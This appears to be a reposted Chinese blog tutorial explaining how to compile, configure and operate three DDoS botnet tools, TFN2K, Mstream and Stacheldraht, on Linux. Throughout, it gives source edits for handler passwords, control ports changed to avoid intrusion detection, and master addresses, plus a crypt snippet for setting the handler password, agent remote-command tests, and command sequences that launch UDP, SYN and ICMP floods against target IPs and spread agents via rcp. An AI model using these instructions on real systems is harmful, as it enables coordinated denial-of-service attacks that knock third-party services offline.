什么是TFN2K?
TFN2K 的作者是著名的德国黑客mixter.
http://mixter.void.ru/papers.html
TFN2K通过主控端利用大量代理端主机的资源进行对一个或多个目标进行协同攻击。当前互联网中的
UNIX、Solaris和Windows
NT等平台的主机能被用于此类攻击,而且这个工具非常容易被移植到其它系统
平台上。
TFN2K由两部分组成:在主控端主机上的客户端和在代理端主机上的守护进程。主控端向其代理端发
送攻击指定的目标主机列表。代理端据此对目标进行拒绝服务攻击。由一个主控端控制的多个代理端主
机,能够在攻击过程中相互协同,保证攻击的连续性。主控央和代理端的网络通讯是经过加密的,还可
能混杂了许多虚假数据包。整个TFN2K网络可能使用不同的TCP、UDP或ICMP包进行通讯。而且主控端还能
伪造其IP地址。所有这些特性都使发展防御
TFN2K攻击的策略和技术都非常困难或效率低下。
如何使用TFN2K?
--------------
我的使用环境:Linux
1, 解压
tar zxvf tfn2k.tgz
2, 修改
a.
src/Makefile
如果你的系统是linux系统,不需要做任何修就可以,
如果你想生产Windows下的代理端,需要做
一 些修改,但是我编译后的文件在Win2000 & WinXP下出错。
b. src/ip.h
注释掉以下部分,否则编译出错。
3,编译
a.
cd tfn2k
make
或者:
b. cd tfn2k/src
make
在提示设置密码后,会生成 tfn
和 td 两个文件,其中 tfn 是控制段,td 是守护进程。
4, 安装 td
自己去安装吧,需要root权限。
5,
攻击
a. 编辑一个文本文件,将安装了 td 的机器的ip地址添加进去,
格式为:
ip
ip
...
...
b. 测试代理端(可选)
./tfn -f host.txt -c 10 -i "mkdir /tmp/test_TFN2K"
检查安装了
td 的机器是否存在 /tmp/test_TFN2K 目录
c.
./tfn 列出命令的格式和参数
./tfn -f host -c 4 -i
1.1.1.1 对1.1.1.1发动 UDP flood 攻击
#########################
Mstream ##############################
mstream的源程序共有两个文件:master.c 和 server.c
其中server.c用于生成agent端程序server,
master.c用于生成控制端程序 master.
简单使用流程:
client(s)-->handler(s)-->agent(s)-->victim(s)
clent: attacker所在主机
handler: 运行 master
程序
agent: 运行 server 程序
victim:
被攻击主机
1,
修改源程序以符合自己的要求
注: 修改口令能防止自己的agent被滥用,
修改控制端口利于躲避IDS的探测.
server.c
-----------------------------
#define PASSWORD "pssword"
#define
SERVERFILE ".sr"
#define MASTER_TCP_PORT
6723
#define MASTER_UDP_PORT 9325
#define SERVER_PORT 7983
#define MAXUSERS 3
#define USED 1
#define AUTH 2
#define max(one, two) (one > two ? one : two)
...
....
-------------------------------
其中比较关键是:
#define PASSWORD "pssword" 将"password"替换成你自己的密码
#define
MASTER_TCP_PORT 6723 和 #define MASTER_UDP_PORT 9325 是设置控制端口需要和master.c中
一致.
master.c
---------------------------------------
char *m[]={
"1.1.1.1",
"2.2.2.2",
"3.3.3.3",
0 };
#define MASTER_PORT 9325
#define SERVER_PORT 7983
...
...
-----------------------------------------
char *m[]={
"1.1.1.1",
"2.2.2.2",
"3.3.3.3",
0 };
以上的ip地址要根据需要设置成你自己的.
#define MASTER_PORT 9325
#define
SERVER_PORT 7983
以上端口要和server.c中的设置一致.
2,
编译
gcc -o master master.c
gcc -o server server.c
3, 安装
自己选择合适的机器安装master和server程序.
并运行.
4,
使用
a. telnet ip port # ip 为运行master的主机,
port为编译时设置的master_port
输入编译时设置的密码后,
进入handler控制模式:
如下:
--------------------
#
telnet 1.1.1.1 6723
Trying 1.1.1.1...
Connected to 1.1.1.1 (1.1.1.1).
Escape character is ‘^]‘.
password
> help
Available commands:
stream -- stream attack !
servers -- Prints all known servers.
ping -- ping all servers.
who -- tells
you the ips of the people logged in
mstream -- lets you stream more than one ip at a time
>
----------------------
命令简介:
注:测试中我发现我这个版本的stream命令没有效果,均使用mstream发起攻击。
servers
显示当前所有已知Agents
who
显示当前已建立连接的用户
ping
确认Agents的活动状态。对所有已知Agents发送"ping",每收到一个"pong"回应
就报告用户。
stream
针对单个主机攻击,seconds指定攻击持续时间。Handler将主机名解析成IP地址
并发送命令"mstream/arg1:arg1/arg2"到所有Agents,这里arg1是victim目标IP
地址,arg2是攻击持续时间。
mstream
针对多台主机攻击,seconds指定攻击持续时间。Handler发送命令
"mstream/arg1/arg2"到所有Agents,这里arg1是冒号分隔的victim目标IP地址
列表,arg2是攻击持续时间。
quit
终止Attacker到Handler的连接
b. > mstream 123.123.123.123 60
对主机123.123.123.123发动60秒攻击
>
mstream 1.1.1.1:2.2.2.2:3.3.3.3 60
对多台主机同时发起攻击
######################### stacheldraht
##############################
Stacheldraht攻击网络由一个或多个主控程序("mserv.c")和大量的代理程序("leaf/td.c")组
成,同时还有用于提供加密功能的网络连接和通讯程序("telnet.c/client.c")。一个典型网络结构如
下:
攻击者-->主控端-->代理端-->受害者
1, 解压
#
tar zvfz stachel.tgz
# cd
stacheldrahtV4
# ls -l
total 136
-rw-r--r-- 1 root root 13232
Aug 25 1999 bf_tab.h
-rw-r--r-- 1 root
root 6597 Aug 25 1999 blowfish.c
-rw-r--r-- 1 root root 1291 Aug 25 1999 blowfish.h
-rw-r--r-- 1 root root 1276 Feb 5 2000 config.h
drwxr-xr-x 2 root root 4096 Dec 13 11:15 leaf
-rw-r--r-- 1 root root 167 Sep 16 1999 Makefile
-rwxr-xr-x 1 root root 46244 Dec 13 10:12 mserv
-rw-r--r-- 1 root root 39685 Dec 13 11:01 mserv.c
drwxr-xr-x 2 root root 4096 Dec 13 11:08 telnetc
-rw-r--r-- 1 root root 3089 Aug 25 1999 tubby.h
2,修改源代码(注:行数仅供参考)
a、stacheldrahtV4/leaf/control.h
下述部分需要注释掉
-------------------------------------------------------
12
b、端口:
下面三个程序的端口要设置对应,即mserv.c的MSERVERPORT和COMMANDPORT要和td.c、client.c对应
。
密码:
本部分比较关键,很多在编译完成后用clinet连接主控端的时候不知道口令, 因为口令是用3DES加
密后放在
mesrv.c 的 24 //#define SALT
"dRFWfIGlF0zrE" , "dRFWfIGlF0zrE"就是加密后的口令. 它
是用口令的明文和client.c中的
"zA"
(175 strcpy(result,crypt(password,"zA")):)经过3DES加密后的结果。
因为流传到你手中的源代码几乎肯定是被人修改过的, 多以我们需要重新建立自己的密码。可以用
下面的代码:
crypt.c
--------------------------------------
#include
#include
int main() // int argc, char **argv)
{
char *input = "11111111";
char *salt = "zA";
printf("%s ",
crypt(input, salt));
return 0;
}
----------------------------------------
# gcc -lcrypt -o crypt crypt.c
#
./crypt
zAj9s/lEcOIC.
//此为密码明文11111111和zA加密后的密文
将密文"zAj9s/lEcOIC."替换mesrv.c 的"dRFWfIGlF0zrE"(24 //#define SALT
"dRFWfIGlF0zrE")
注意""需要保留.
此时编译后的密码为"11111111" 。
td.c
-----------------------------------------
38 -
39 #define MSERVER1 "10.2.0.100"
40
#define MSERVER2 "192.168.0.84"
59 #define COMMANDPORT 65513
mserv.c
-------------------------------------------
23
25 #define SALT "zAj9s/lEcOIC."
26
27
28 #define MSERVERPORT 65512
37 #define LOCALIP "10.2.0.100"
41
42
#define COMMANDPORT 65513
client.c
-----------------------------------------------
24 #define MASTERSERVERPORT 65512
25
#define timeout 10
175
strcpy(result,crypt(password,"zA"));
3、编译
分别在3个目录中运行make后,生成了文件mesrv、clinet和td。
4、安装
将client和mesrv安装到你需要(能够)安装的机器,并运行。
5、使用
#
./client 1.1.1.1 //安装了msecrv的机器的ip
[*]
stacheldraht [*]
(c)
in 1999 by randomizer
trying to connect...
connection
established.
--------------------------------------
enter the passphrase : 11111111 //我们设置的密码是"11111111"
--------------------------------------
entering interactive session.
******************************
welcome
to stacheldraht
******************************
type
.help if you are lame
stacheldraht(status: a!1 d!0)> //提示的"a!1 d!0"表示当前有活动和停止的代理端主机数量
stacheldraht(status: a!1 d!0)>.help
available commands in this version are:
--------------------------------------------------
.mtimer .mudp .micmp .msyn .msort .mping
.madd .mlist .msadd .msrem .distro .help
.setusize .setisize .mdie .sprange .mstop .killall
.showdead .showalive
--------------------------------------------------
stacheldraht(status: a!1 d!0)>
使用命令如下:
.distro user server
通知代理端程序使用"rcp"命令将其自身在主机"server"以"user"帐号安装并运行。
.help
显示帮助信息。
.killall
杀死所有活动的代理端程序。
.madd
ip1[:ip2[:ipN]]
添加IP地址到攻击目标列表中。
.mdie
向所有代理端程序发送"die"请求。
.mdos
启动拒绝服务攻击。
.micmp ip1[:ip2[:ipN]]
启动针对指定主机的ICMP
flood攻击。
.mlist
列出当前正被进行拒绝服务攻击的主机IP地址。
.mping
测试所有的代理端是否仍在活动。
.msadd
添加新的主控端主机到列表中。
.msort
排序输出已停止/正活动的代理端。
.mstop ip1[:ip2[:ipN]]
.mstop all
停止指定IP地址或所有的攻击。
.msrem
从列表中删除一个主控端主机。
.msyn ip1[:ip2[:ipN]]
启动对指定主机的SYN
flood攻击。
.mtimer
seconds
设置攻击持续时间。
.mudp ip1[:ip2[:ipN]]
启动对指定主机的UDP
flood攻击。
.setisize
设置ICMP攻击包大小(最大:1024,缺省:1024)。
.setusize
设置UDP攻击包大小(最大:1024,缺省:1024)。
.showalive
显示所有“正活动”的代理端主机。
.showdead
显示所有“已停止”的代理端主机。
.sprange lowport-highport
设置SYN
flood攻击的端口范围(缺省为0-140)。
相关文章
- 09-29linux下的3种DDOS软件介绍
- 09-29使用 windows 下的 secureCRT 软件的 通过 sftp 上传和下载文件到远端 linux 设备
- 09-29PSPP:顶替SPSS常用功能的优秀软件, Linux 下的经济学用软件
- 09-29CentOS7下常用安装服务软件源码编译安装方式的介绍
- 09-29Linux下非root用户安装软件的一般流程:
- 09-29Linux下软件的安装与管理
- 09-29Linux Centos下软件的安装与卸载方法
- 09-29笔记:Linux下软件的安装、CentOS更新yum源、LAMP环境搭建、kali软件管理
- 09-29浅析linux下软件的安装
- 09-29linux下软件的安装与卸载